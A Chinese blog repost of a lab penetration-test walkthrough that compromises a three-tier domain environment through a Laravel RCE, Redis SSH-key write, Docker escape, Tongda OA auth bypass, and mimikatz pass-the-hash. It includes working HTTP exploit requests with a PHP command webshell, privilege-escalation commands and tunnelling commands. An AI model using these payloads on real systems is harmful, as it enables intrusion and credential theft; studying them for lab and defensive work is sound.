记一次曲折的域环境渗透测试 IV

admin 2022年8月2日13:12:29评论34 views字数 3425阅读11分25秒阅读模式

记一次曲折的域环境渗透测试 IV
 一、 环境 
DMZ区域:
Ubuntu (Web 1)配置了两个网卡,一个桥接可以对外提供服务;一个连接在VMnet8上连通第二层网络。
第二层网络区域:
Ubuntu (Web 2)Windows 7 (PC 1)都配置了两个网卡,一个连接在VMnet8上连通第二层网络,一个连接在VMnet14上连通第三层网络。
第三次网络区域:
Windows Server 2012Windows 7 (PC 2)都只配置了一个网卡,一个连接在VMnet14上连通第三层网络。

记一次曲折的域环境渗透测试 IV
 二、 WEB 渗透 

2.1   信息收集

首先获得目标ip192.168.1.104,对目标进行端口服务扫描
记一次曲折的域环境渗透测试 IV
扫描后发现2280816379端口
访问81发现laravel
记一次曲折的域环境渗透测试 IV


2.2   CVE-2021-3129

这里直接用REC上传shell

记一次曲折的域环境渗透测试 IV


记一次曲折的域环境渗透测试 IV
发现目标网站在容器中
记一次曲折的域环境渗透测试 IV


2.3   提权

目前我们在www-data用户下,权限较低,需要先提权
记一次曲折的域环境渗透测试 IV

首先需要找到高权限的文件
find / -perm -u=s -type f 2>/dev/null
记一次曲折的域环境渗透测试 IV

此处我们发现home目录下存在shell文件,运行发现是ps命令
记一次曲折的域环境渗透测试 IV

因为蚁剑是伪终端,所以需要先反弹shellkali
记一次曲折的域环境渗透测试 IV

记一次曲折的域环境渗透测试 IV
尝试更改$PATH来提权
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
export PATH=/tmp:$PATH
cd /home/jobs
./shell
记一次曲折的域环境渗透测试 IV

此时我们已经获得root权限
后面本来想做docker逃逸的,但是逃逸一直不成功,所以先换个思路


2.4   redis未授权

我们发现目标机192.168.1.104还开启了6379端口
记一次曲折的域环境渗透测试 IV
首先在kali生成密钥
ssh-keygen -t rsa
(echo -e "nn"; cat /root/.ssh/id_rsa.pub; echo -e "nn") > 1.txt   #
将公钥信息写入1.txt
cat 1.txt | redis-cli -h 192.168.0.103 -x set xxx
记一次曲折的域环境渗透测试 IV
然后使用redisssh公钥写入目标主机:
config set dir /root/.ssh    # 设置redis的备份路径为/root/.ssh/
config set dbfilename authorized_keys    #
设置保存文件名为authorized_keys
save    #
将数据保存在目标服务器硬盘上
记一次曲折的域环境渗透测试 IV
ssh登陆
记一次曲折的域环境渗透测试 IV
上线msf
记一次曲折的域环境渗透测试 IV

记一次曲折的域环境渗透测试 IV
找到内网192.168.52.0/24网段
记一次曲折的域环境渗透测试 IV


2.5   docker逃逸

这里使用特权模式逃逸
首先创建一个目录来挂载文件:
mkdir /th1e
docker容器里挂载一个宿主的本地目录,这样某些容器里输出的文件,就可以在本地目录中打开访问了
mount /dev/sda1. /th1e
记一次曲折的域环境渗透测试 IV
这里计划任务不知道为什么一直执行失败
因为我们现在是root权限,可以直接拿密码去解密
cat /th1e/etc/shadow
记一次曲折的域环境渗透测试 IV

还有一种办法,这里试试修改密钥
还是在kali生成ssh-keygen
ssh-keygen -f web
webweb.pub上传到服务器上
web.pub写入到宿主机root.ssh
记一次曲折的域环境渗透测试 IV
在跳板机上远程连接成功
记一次曲折的域环境渗透测试 IV
这里把这一台也上线到msf,这里创建一个正向连接
记一次曲折的域环境渗透测试 IV
成功上线
记一次曲折的域环境渗透测试 IV


记一次曲折的域环境渗透测试 IV
 三、 二层网络渗透 
此时我们得到两台主机权限,分别是192.168.1.104192.168.52.20
先挂上代理
kali:
./ew_for_linux64 -s rcsocks -l 7777 -e 1234
记一次曲折的域环境渗透测试 IV
目标机:
./ew_for_linux64 -s rssocks -d 192.168.1.128 -e 1234
记一次曲折的域环境渗透测试 IV
此时我们对192.168.52.30进行扫描
记一次曲折的域环境渗透测试 IV
这里看到8080跑了nginx,直接网页代理上去看看


3.1   通达OA

首先查看版本号
记一次曲折的域环境渗透测试 IV
版本为11.3


3.1.1     任意用户登陆

登陆抓包
记一次曲折的域环境渗透测试 IV
指向/logincheck_code.php、删除cookie并在post中添加UID=1
记一次曲折的域环境渗透测试 IV
使用PHPSESSID访问/general/
记一次曲折的域环境渗透测试 IV
远程登录成功


3.1.2      任意文件上传

任意文件上传漏洞/ispirit/im/upload.php
POST /ispirit/im/upload.php HTTP/1.1
Host: 49.233.3.2:8888
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--
记一次曲折的域环境渗透测试 IV
上传成功,文件名为2102/130054384.jpg


3.1.3      文件包含

POST /ispirit/interface/gateway.php HTTP/1.1
Host: 49.233.3.2:8888
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 69
Content-Type: application/x-www-form-urlencoded

json={"url":"/general/../../attach/im/2007/422124454.jpg"}&cmd=whoami
记一次曲折的域环境渗透测试 IV
命令执行成功


3.2   getshell

使用psh-cmd载荷类型
记一次曲折的域环境渗透测试 IV
成功上线msf
记一次曲折的域环境渗透测试 IV


3.3   信息收集

记一次曲折的域环境渗透测试 IV
发现192.168.93.0网段
加上内网路由
记一次曲折的域环境渗透测试 IV
arp扫描93网段存活主机
记一次曲折的域环境渗透测试 IV
kiwi抓取密码
记一次曲折的域环境渗透测试 IV



记一次曲折的域环境渗透测试 IV
 四、 三层网络渗透 

4.1   CS

碰到windows直接发病了!
RNM,CS上线!!!
生成一个webpowershell
记一次曲折的域环境渗透测试 IV
上线CS
记一次曲折的域环境渗透测试 IV
扫描内网主机端口
记一次曲折的域环境渗透测试 IV
先把hash弄下来,run mimikatz
记一次曲折的域环境渗透测试 IV
这里直接拿到administrator密码就没什么好说的了,直接hash传递拿域控,然后加个新的监听再用拿下域内主机
记一次曲折的域环境渗透测试 IV
CS没什么好说的,到这就算完事了


4.2   MSF

这里再玩玩MSF
记一次曲折的域环境渗透测试 IV
发现hash传递失败了,防火墙?
关掉关掉,一定要关掉.....
记一次曲折的域环境渗透测试 IV
然后在传递hash
记一次曲折的域环境渗透测试 IV
直接拿下
PS:这可能是这个系列最后一篇内容了,顺应公司规划,后续工作重心调整到其他方面,不会再产出域渗透相关内容了...

原文始发于微信公众号(山石网科安全技术研究院):记一次曲折的域环境渗透测试 IV

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月2日13:12:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次曲折的域环境渗透测试 IVhttp://cn-sec.com/archives/1214541.html

发表评论

匿名网友 填写信息